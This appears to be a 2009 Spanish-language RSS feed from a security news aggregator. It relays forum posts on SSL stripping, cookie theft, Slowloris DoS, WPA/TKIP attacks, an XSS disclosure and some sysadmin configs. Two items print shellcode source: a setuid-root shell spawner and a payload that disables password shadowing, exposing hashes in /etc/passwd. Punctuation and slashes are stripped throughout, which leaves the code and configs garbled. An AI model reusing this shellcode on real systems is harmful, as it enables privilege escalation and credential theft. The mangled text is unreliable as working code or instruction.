tar xzvf -  echo  Encendiendo la VM host1 -  date   var log copiaVMsVMWarelog vmrun -T server -h https fisica1 8333 sdk -u user -p passwd start  standard  host1 host1vmx  echo  Encendida la VM host1 -  date   var log copiaVMsVMWarelog  list all available VMs to log vmrun -T server -h https fisica1 8333 sdk -u user -p passwd list  var log copiaVMsVMWarelog fi  enviando correo tail -100  var log copiaVMsVMWarelog  mail -s  script  copiaVMsVMWaresh  user hostcom IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122355.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122355.shtml</guid></item>
<item><title>Jugando y burlando a SSL con SSLStrip</title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - http wwwwadalbertiaorg phpBB2 viewtopicphp p 55846 PD Gracias al compañero Popolous por el post-it  IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122354.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122354.shtml</guid></item>
<item><title>Jugando a robar cookies con surfjack</title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - http wwwwadalbertiaorg phpBB2 viewtopicphp p 55853 IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122353.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122353.shtml</guid></item>
<item><title>Slowloris - HTTP DoS</title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - http wwwwadalbertiaorg phpBB2 viewtopicphp p 55898 Gracias Sor_Zitroen por la noticia IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122352.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122352.shtml</guid></item>
<item><title>WPA   TKIP Probando con tkiptun-ng</title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - http wwwwadalbertiaorg phpBB2 viewtopicphp p 55867 Gracias a Vic_Thor por la info _de primera mano_, pues es muy dificil encontrar informacion sobre esta herramienta Ah, salio la version 10 para win, aunque no la he probado IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122351.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122351.shtml</guid></item>
<item><title>postfix   logrotate</title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - LOGUEANDO 2 INSTANCIAS DE POSTFIX EN 2 ARCHIVOS DIFERENTES     etc postfix maincf   ---------------------- syslog_facility local1 syslog_name postfix_smtpExtern  etc postfix-out maincf   -------------------------- syslog_facility local2 syslog_name postfix_smtpIntern  etc rsyslogconf   -------------------   Log anything  except mail  of level info or higher   Don't log private authentication messages   info mailnone authprivnone cronnone local1none local2none  var log messages    local2  - var log smtpdInternlog local1  - var log smtpdExternlog Reiniciar demonios  -------------------  etc initd rsyslog restart  etc initd postfix restart  etc initd postfix-out restart   ROTANDO LOS 2 ARCHIVOS DE LOG CON LOGROTATE     etc logrotated syslog  Postfix usa syslog  ---------------------------------------------  var log smtpdInternlog   sharedscripts missingok weekly compress   delaycompress create postrotate  etc initd rsyslog restart  etc initd postfix-out reload endscript rotate 12 mail user hostcom    var log smtpdExternlog   sharedscripts missingok weekly compress   delaycompress create weekly postrotate  etc initd rsyslog restart  etc initd postfix reload endscript rotate 12 mail user hostcom     COMPROBACION FORZANDO ROTACIONES CON LOGROTATE     usr sbin logrotate --force  etc logrotated syslog IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122350.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122350.shtml</guid></item>
<item><title>XSS</title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - El otro dia estuve jugando con XSS, y mande algunos a la conocida xssedcom http wwwxssedcom archive author vlan7  Quiero dedicar primero muy especialmente este  http wwwlsiupcedu dedicado, con cariño, a todos los profesores que tuve que aguantar en su dia del departamento de LSI de la FIB de la UPC  por prohibir las soluciones ingeniosas en sus estupidos problemas Si por ellos fuera nunca aprendo Mande varios, pero yo me quedo con ese Stay clean, IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122349.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122349.shtml</guid></item>
<item><title>Y sigue el culebron Smallest  27 bytes  GNU Linux x86 setuid execve shellcode without NULLs</title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - Como no sabia que era imposible lo hice 27 bytes     include  const char sc   x31 xdb   xor ebx,ebx  x8d x43 x17   LEA eax, ebx   0x17   LEA is FASTER than push pop   x99   cdq  xcd x80   int 80  setuid 0  should returns 0 right     xb0 x0b   mov al,0bh  x52   push edx  Termina la cadena  bin sh con un 0  x68 x6e x2f x73 x68   push dword  hs n   x68 x2f x2f x62 x69   push dword  ib   x89 xe3   mov ebx,edx  x89 xd1   mov ecx,edx  xcd x80   int 80h int main    printf nSMALLEST SETUID   EXECVE GNU LINUX x86 STABLE SHELLCODE    WITHOUT NULLS THAT SPAWNS A SHELL   n nCoded by vlan7   n t   vlan7 at bigfootcom   n t   http vlan7blogspotcom   n n  Date  4 Jul 2009   n  Thanks to  sch3m4   n n  Shellcode Size  pourcentsd bytes n n , sizeof sc -1   void   sc  return 0    Voy a citar de aqui el funcionamiento de setuid  RETURN VALUE Upon successful completion, 0 shall be returned Otherwise, -1 shall be returned and errno set to indicate the error ERRORS The setuid  function shall fail, return -1, and set errno to the corresponding value if one or more of the following are true  Veamos si entramos en alguno de los casos   EINVAL  The value of the uid argument is invalid and not supported by the implementation No UID 0 es un UID valido Es el r00t   EPERM  The process does not have appropriate privileges and uid does not match the real user ID or the saved set-user-ID Logicamente, esto ultimo puede pasar en la version a la que se llego anteriormente Ah, y aqui el hilo de Wadalbertia  Smallest GNU Linux x86 setuid execve shellcode without NULLs Stay clean, IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122348.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122348.shtml</guid></item>
<item><title>unshadowc shellcode</title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - Esta shellcode deshabilita el shadowing en un sistema Linux Todos los passwords de  etc shadow van a  etc passwd , legible por todo el mundo    include  const char sc   x31 xdb   xor ebx,ebx  x8d x43 x17   LEA eax, ebx   0x17   LEA is FASTER than push and pop   x99   cdq  xcd x80   int 80  setuid 0  shouldn't returns -1 right     xb0 x0b   mov al,0bh  x52   push edx  Termina la cadena con un 0  x68 x63 x6f x6e x76   push dword  conv   x68 x70 x77 x75 x6e   push dword  pwun   x68 x62 x69 x6e x2f   push dword  bin   x68 x73 x72 x2f x73   push dword  sr s   x68 x2f x2f x2f x75   push dword  u   x89 xe3   mov ebx,esp  x89 xd1   mov ecx,edx  xcd x80   int 80h void main    printf n  This shellcode disables shadowing on a linux system    n n t   Coded by vlan7    n t   http vlan7blogspotcom    n n   Date  4 Jul 2009   n tYou'll have the passwords stored in  etc passwd   n tFor undo purposes use the pwconv command   n t   Cheers go to  Wadalbertia   n t   Shellcode Size  pourcentsd bytes n n , sizeof sc -1   void   sc   IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122347.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122347.shtml</guid></item>
<item><title>una historia inofensiva pero real   XSS en la web de la Guardia Civil  </title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - Pues nada, un XSS que descubri el otro dia jugando Ahi va  Full Disclosure 100pourcents DIY  esto es, a mi manera  donde se habla de una historia inofensiva pero real   XSS en la web de la Guardia Civil   Por By  vlan7   http vlan7blogspotcom     Fecha de descubrimiento y contacto con la Guardia Civil  5-Jul-09 Fecha en la que la Guardia Civil responde confirmándolo  6-Jul-09 Fecha en la que este XSS queda mitigado  7-Jul-2009  Full Disclosure  released to the public  10-Jul-2009   ---------------------------------------------------------------------  No hemos hecho nada del otro mundo, porque vivimos en este  Eskorbuto PD No es mi especialidad la seguridad web, cualquier correccion sera bienvenida Gracias He añadido un archivo ZIP con las referencias, que realmente es lo mejor del documento  D Hay alguno bastante bueno Referencias http wwwwadalbertiaorg phpBB2 viewtopicphp p 56031 IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122346.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122346.shtml</guid></item>
</channel>
</rss>
 
